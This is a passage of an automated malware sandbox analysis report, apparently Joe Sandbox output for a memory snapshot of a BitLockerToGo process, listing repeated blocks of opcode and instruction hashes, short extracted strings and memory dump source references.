                                                                              • Opcode Fuzzy Hash: e39be9cbc409b82bf681a979cf58eb53d2faca929fdffb9493e5835ff5305fb1
                                                                              • Instruction Fuzzy Hash: 55F15172A083228BC724CF28C4912ABB7B1FFE9754F19992DD4C55B361E3788D45C78A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8Pf$<Pf$jk
                                                                              • API String ID: 0-3570891835
                                                                              • Opcode ID: 930427240512bd6f50e1c4d9ba4c5de0818c71dc2a2993db0fa5435669705e51
                                                                              • Instruction ID: ae7c215f8c75da64b50bcda0f54d2b36221581d83e9dc76fab4bfd56f5ba9717
                                                                              • Opcode Fuzzy Hash: 930427240512bd6f50e1c4d9ba4c5de0818c71dc2a2993db0fa5435669705e51
                                                                              • Instruction Fuzzy Hash: 20B1F0B1A083118BC724CF29C85266BB3F1EF95314F18892DE8D59B391F738D945C79A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ()$g%m'$l!m#
                                                                              • API String ID: 0-2849597525
                                                                              • Opcode ID: c96e76cb4c71d67e2cb54a96478e9b3343958cebf8ace4911c44675bda810d57
                                                                              • Instruction ID: d99342074ea348660b36b0fac1cbc1d582d822c10d6aeeecfece7293a98d772b
                                                                              • Opcode Fuzzy Hash: c96e76cb4c71d67e2cb54a96478e9b3343958cebf8ace4911c44675bda810d57
                                                                              • Instruction Fuzzy Hash: BCA157725042109BC724DF249992ABB73E1EF91314F19C96EF88A97382E77CD905C36A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: B$XY$IK
                                                                              • API String ID: 0-519197200
                                                                              • Opcode ID: a86d51d85178c138cee1349a62111f58cddd48a1809fea3b63e08104cebe4e92
                                                                              • Instruction ID: fe947203b70187deb78311381939890ea278dd347db29840a4e636d8a8d46fa2
                                                                              • Opcode Fuzzy Hash: a86d51d85178c138cee1349a62111f58cddd48a1809fea3b63e08104cebe4e92
                                                                              • Instruction Fuzzy Hash: 2BB166B01193818BD7348F25D8A13EBBBE1EFD6314F15892ED4C99B390EB398445CB96
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 9$WeTg$pq
                                                                              • API String ID: 0-4227282826
                                                                              • Opcode ID: 29b7ee78a80bcb11586c180353a09a8a8ee11f46d0935eb4837ffc1c9f37b421
                                                                              • Instruction ID: f1c97ea9a7c7957dcc91d9ccc894a9d4628c7a668c34a7834ec17e0d999cdbcd
                                                                              • Opcode Fuzzy Hash: 29b7ee78a80bcb11586c180353a09a8a8ee11f46d0935eb4837ffc1c9f37b421
                                                                              • Instruction Fuzzy Hash: 1D7104729083D18AD325CF2688913EBBBD1DFD2304F19896EC5CD5B342DB7944068B9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 7$ZjYl$ef
                                                                              • API String ID: 0-943923054
                                                                              • Opcode ID: 5cb7366f85f7311a0482972f49a88fe8a35cd9114ed31f12551c82d03587fa01
                                                                              • Instruction ID: b927d38c0823e34978966d68cd0bc366805b75e3bdb679542b6ca94706f88824
                                                                              • Opcode Fuzzy Hash: 5cb7366f85f7311a0482972f49a88fe8a35cd9114ed31f12551c82d03587fa01
                                                                              • Instruction Fuzzy Hash: 27711BB060C3D08BD3658B3994A17EBBBD09F93314F28C96ED5DD8B382CA79440A8757
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 7$ZjYl$ef
                                                                              • API String ID: 0-943923054
                                                                              • Opcode ID: e56fdd27e0123e9163d455dc71d4b432eb36293acd80bb192608007fc35126f9
                                                                              • Instruction ID: 094462d7138adf8d9e34443285f81f9bdab5021995c84d19929d285c4faf45de
                                                                              • Opcode Fuzzy Hash: e56fdd27e0123e9163d455dc71d4b432eb36293acd80bb192608007fc35126f9
                                                                              • Instruction Fuzzy Hash: E071FBB060C3C18BD3658B3994A17EBBBD09F93314F28C96ED5DD8B382CA79444A8757
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 7$ZjYl$ef
                                                                              • API String ID: 0-943923054
                                                                              • Opcode ID: 674682cdff99ebac7b53e4e28deba82746067c2205645ba73eb32f96b885a146
                                                                              • Instruction ID: 03c0a147cd99a2de4204b749523d9c8db682a1f036b61b25f441666b7573f814
                                                                              • Opcode Fuzzy Hash: 674682cdff99ebac7b53e4e28deba82746067c2205645ba73eb32f96b885a146
                                                                              • Instruction Fuzzy Hash: 58710AB050C3C18BD3658B3994A27EBBBD09F93314F28C96ED5DD8B382CA79444A8757
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: #G$WeTg$pq
                                                                              • API String ID: 0-1652550598
                                                                              • Opcode ID: b80dc84b1d62090fc5d4443e0bab6c1670936563087ddf6f8f69ab2abb63606f
                                                                              • Instruction ID: 2e15b4f9d696fee8bafbd10ac21e44275103dd66deb28bb0bfeb3543752ff44e
                                                                              • Opcode Fuzzy Hash: b80dc84b1d62090fc5d4443e0bab6c1670936563087ddf6f8f69ab2abb63606f
                                                                              • Instruction Fuzzy Hash: DE61C17190D3D18AD325CB2584607EBBBE1EFD2304F18896ED5CD5B342DB7944068B9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: XS$g;pr$x~v~
                                                                              • API String ID: 0-2786257683
                                                                              • Opcode ID: 2717e089d93bcc80282abfee89a779a5755a61d5ea2bd807d4343850fd2c7f6b
                                                                              • Instruction ID: eec59ad20fbcc35fa44e57512c98952311ad87732867fa1ba96c8ccab3cc0341
                                                                              • Opcode Fuzzy Hash: 2717e089d93bcc80282abfee89a779a5755a61d5ea2bd807d4343850fd2c7f6b
                                                                              • Instruction Fuzzy Hash: 394116F02083408FD7149F29985176FBBE1FBA6315F148A2EE1D69B3A0D779C941CB0A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0$8
                                                                              • API String ID: 0-46163386
                                                                              • Opcode ID: 720996da9b227c28856ffc997d2ba7a0a0382bc9ac054635e9468280b93b132d
                                                                              • Instruction ID: abf0bd5007e0a28feef1a17ddd9cb00017a87db2347c630f742681cd26c0577d
                                                                              • Opcode Fuzzy Hash: 720996da9b227c28856ffc997d2ba7a0a0382bc9ac054635e9468280b93b132d
                                                                              • Instruction Fuzzy Hash: C37249715083409FD714CF18C890BABBBE1BF88319F44891EF9988B392D779D958CB96
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: \Z[\$rkF
                                                                              • API String ID: 0-439846777
                                                                              • Opcode ID: 135095d13851acbe263856d5606749621940399603fb3e938d0c58ab404a748d
                                                                              • Instruction ID: ba270e9dbe1725dca084d9b4bcb852e2c1f514313f9ce18d0df564c45bc083f0
                                                                              • Opcode Fuzzy Hash: 135095d13851acbe263856d5606749621940399603fb3e938d0c58ab404a748d
                                                                              • Instruction Fuzzy Hash: CBF10472A082508FD724DF28D89176BB7E1EB95305F16893EE4DA87351E738AC05CB87
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: )$IEND
                                                                              • API String ID: 0-707183367
                                                                              • Opcode ID: 60bb0b2d5317d8de7909e6f86ec825f4a520d66d95a5028a60cd6b597090a8dc
                                                                              • Instruction ID: 4724041ebbf2627e6301c64067db26ce40d6edb2021ebbfa0f6b64223a377995
                                                                              • Opcode Fuzzy Hash: 60bb0b2d5317d8de7909e6f86ec825f4a520d66d95a5028a60cd6b597090a8dc
                                                                              • Instruction Fuzzy Hash: C9D1CE71608344AFE710CF15C84179FBBE0AB95308F14492EFD99AB382D778D948CB9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: W&Y8$wY
                                                                              • API String ID: 0-3891952581
                                                                              • Opcode ID: 2507c72a95234646bc5989b5d4c2dbe09dc53e3271321e4a318e19942e5a0e06
                                                                              • Instruction ID: 0e36f2370318680c7272024c6a16cd6ac1239a71965ee9bfeaf052a672b7d637
                                                                              • Opcode Fuzzy Hash: 2507c72a95234646bc5989b5d4c2dbe09dc53e3271321e4a318e19942e5a0e06
                                                                              • Instruction Fuzzy Hash: 3D913B716043019BD724DF24CC92BAB77A5EF81318F15842DFA898B391E7BDD809C76A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 7$gfff
                                                                              • API String ID: 0-3777064726
                                                                              • Opcode ID: 35a57d1682e5977cde182286109dba063e5ba34ffb1cf6adfafa372e5608980a
                                                                              • Instruction ID: 9b55ffdf82116554c499ab2b1b30563f75bdb53e445278d2886738a27af4b332
                                                                              • Opcode Fuzzy Hash: 35a57d1682e5977cde182286109dba063e5ba34ffb1cf6adfafa372e5608980a
                                                                              • Instruction Fuzzy Hash: 2B7137766182018FD718CF28C851B6B77E6EBC5319F49C53EE485C7352EA38D80587C6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@
                                                                              • API String ID: 0-149943524
                                                                              • Opcode ID: 13506d9f51f0725fbff490ae71a12c0f857b65aa8ee9073c70b5c47fb35bf0cc
                                                                              • Instruction ID: 2261653b42abb053f5dbe648389041af9374e3ca33a3b931b149c2d7ca94ea33
                                                                              • Opcode Fuzzy Hash: 13506d9f51f0725fbff490ae71a12c0f857b65aa8ee9073c70b5c47fb35bf0cc
                                                                              • Instruction Fuzzy Hash: 8C417C706083108FE715DF29C4A132FB7E2EFEA304F14592EE4C69B364D73998058B9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: f
                                                                              • API String ID: 2994545307-1993550816
                                                                              • Opcode ID: 442463b6c4acb0a3f759a1beafb8f1901fbc7351451f4f9dc5074da67ba86715
                                                                              • Instruction ID: 0a637742b7155aa1c002dde01e05ae1e919d01256e578745514914ba7a502f90
                                                                              • Opcode Fuzzy Hash: 442463b6c4acb0a3f759a1beafb8f1901fbc7351451f4f9dc5074da67ba86715
                                                                              • Instruction Fuzzy Hash: DD22F0716083018FE714DF28C890A2FB7E2EBD9314F188A2EE58297391D679EC15CB57
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: T3
                                                                              • API String ID: 0-344261593
                                                                              • Opcode ID: d95edc0607edab9827d2177dc08f7638887f473107389c3a07ade987df51399b
                                                                              • Instruction ID: 21cfa7a1a8bd231b5145c2e4bf8d1b541b15b05280d9092698ecb113af1204fc
                                                                              • Opcode Fuzzy Hash: d95edc0607edab9827d2177dc08f7638887f473107389c3a07ade987df51399b
                                                                              • Instruction Fuzzy Hash: 26125675E04214DFDB04CF68D881AEE77B1BF9A314F09427AE815A7392C7399D02CB98
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ?
                                                                              • API String ID: 0-3565122415
                                                                              • Opcode ID: 5b62c29318f011f4e130d1dd0437e1d0f2a0f2e6461b05b67e92b8c52670fc09
                                                                              • Instruction ID: a820787184e4432ae99e2c705d18783034c3c661ab8059c601df747b7596db89
                                                                              • Opcode Fuzzy Hash: 5b62c29318f011f4e130d1dd0437e1d0f2a0f2e6461b05b67e92b8c52670fc09
                                                                              • Instruction Fuzzy Hash: 0CD121B5A493008AD7249F64C81677BB3F1EFD1304F08C92DE4D99B3A1EB788905C79A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "
                                                                              • API String ID: 0-123907689
                                                                              • Opcode ID: fe902692c3b8d53163594c6caf9ebea2b27079d1cbe6db476b91e9a148f98053
                                                                              • Instruction ID: db0f14f39416bf80099ff989acb2d51f08534cd0980dd85aadd0f0eef2bbf2fc
                                                                              • Opcode Fuzzy Hash: fe902692c3b8d53163594c6caf9ebea2b27079d1cbe6db476b91e9a148f98053
                                                                              • Instruction Fuzzy Hash: C3C1F272A083109BD714CE25C485BAFB7E9ABC4314F19C96EE89D87382E738DC548797
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >
                                                                              • API String ID: 0-325317158
                                                                              • Opcode ID: 6adc80c271d8342cd39bf224d59c3dce64fba14735daa431242638f2c25b6247
                                                                              • Instruction ID: ffb7c9a1b4a0faf5d9b4a52034b1b58c8cbae4159524c4376c844a93fce787ea
                                                                              • Opcode Fuzzy Hash: 6adc80c271d8342cd39bf224d59c3dce64fba14735daa431242638f2c25b6247
                                                                              • Instruction Fuzzy Hash: FBB11571A04204CFDB14CF68D891BAEBBB2FB89314F25853ED505AB791D735A902CF94
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ~
                                                                              • API String ID: 0-1707062198
                                                                              • Opcode ID: f8b32380f23d3dfcc73132519827cf971ba1ea6f10a2daa04fe49a77ecfa021c
                                                                              • Instruction ID: 741d7e00cd65fa675e00fc790a352877035fd33092f31f791fa831c31919c069
                                                                              • Opcode Fuzzy Hash: f8b32380f23d3dfcc73132519827cf971ba1ea6f10a2daa04fe49a77ecfa021c
                                                                              • Instruction Fuzzy Hash: C8814972E042614FC7218E28C85136BBBD1AB85324F1DC63EECB99B386D6389C05D3D2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ,
                                                                              • API String ID: 0-3772416878
                                                                              • Opcode ID: 117ff63be0be23f5ec98320ee74d003667c73d5058d94a6249ac822727b72163
                                                                              • Instruction ID: b3d5b452f3a72bd5a429dfc6655fdcca04fd672bd83db38e53fe507299da25da
                                                                              • Opcode Fuzzy Hash: 117ff63be0be23f5ec98320ee74d003667c73d5058d94a6249ac822727b72163
                                                                              • Instruction Fuzzy Hash: 37B158712097819FC320CF18C89061BFBE0AFA9704F444A6EF5D997782D635E908CBA7
                                                                              Strings
                                                                              Memory Dump Source
